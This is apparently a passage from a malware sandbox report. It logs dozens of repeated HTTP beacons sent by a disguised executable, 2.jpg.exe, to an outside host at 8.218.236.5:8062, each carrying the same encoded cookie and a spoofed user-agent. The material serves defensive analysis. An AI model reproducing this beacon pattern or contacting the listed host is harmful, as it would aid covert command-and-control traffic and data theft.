Apr 19, 2024 09:53:35.174315929 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:35.487217903 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
276	192.168.2.4	50012	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:35.914748907 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:36.232033014 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
277	192.168.2.4	50013	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:36.686815023 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:37.028213024 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
278	192.168.2.4	50014	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:37.473169088 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:37.799137115 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
279	192.168.2.4	50015	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:38.227993965 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:38.549602032 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
280	192.168.2.4	50016	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:38.986730099 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:39.317820072 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
281	192.168.2.4	50017	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:39.752973080 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:40.079468966 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
282	192.168.2.4	50018	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:40.508969069 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:40.828886986 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
283	192.168.2.4	50019	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:41.256436110 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:41.574795961 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
284	192.168.2.4	50020	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:42.015873909 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:42.344683886 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
285	192.168.2.4	50021	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:42.765213013 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:43.077380896 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
286	192.168.2.4	50022	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:43.509057999 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:43.828865051 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
287	192.168.2.4	50023	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:44.264870882 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:44.588299990 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
288	192.168.2.4	50024	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:45.019716024 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:45.336070061 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
289	192.168.2.4	50025	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:45.757251978 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:46.074914932 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
290	192.168.2.4	50026	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:46.532810926 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:46.873928070 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
291	192.168.2.4	50027	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:47.329307079 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:47.664074898 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
292	192.168.2.4	50028	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:48.083897114 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:48.399338961 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
293	192.168.2.4	50029	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:48.841203928 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:49.166935921 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
294	192.168.2.4	50030	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:49.599754095 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:49.917567968 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
295	192.168.2.4	50031	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:50.352741957 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:50.670445919 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
296	192.168.2.4	50032	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:51.098727942 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:51.415112019 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
297	192.168.2.4	50033	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:51.856956959 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:52.179464102 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
298	192.168.2.4	50034	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:52.601869106 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:52.922900915 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
299	192.168.2.4	50035	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:53.353899956 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:53.674177885 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
300	192.168.2.4	50036	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:54.107842922 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:54.431200027 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
301	192.168.2.4	50037	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:54.874789953 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:55.200551987 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
302	192.168.2.4	50038	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:55.636277914 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:55.958601952 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
303	192.168.2.4	50039	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:56.416897058 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:56.759047985 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
304	192.168.2.4	50040	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
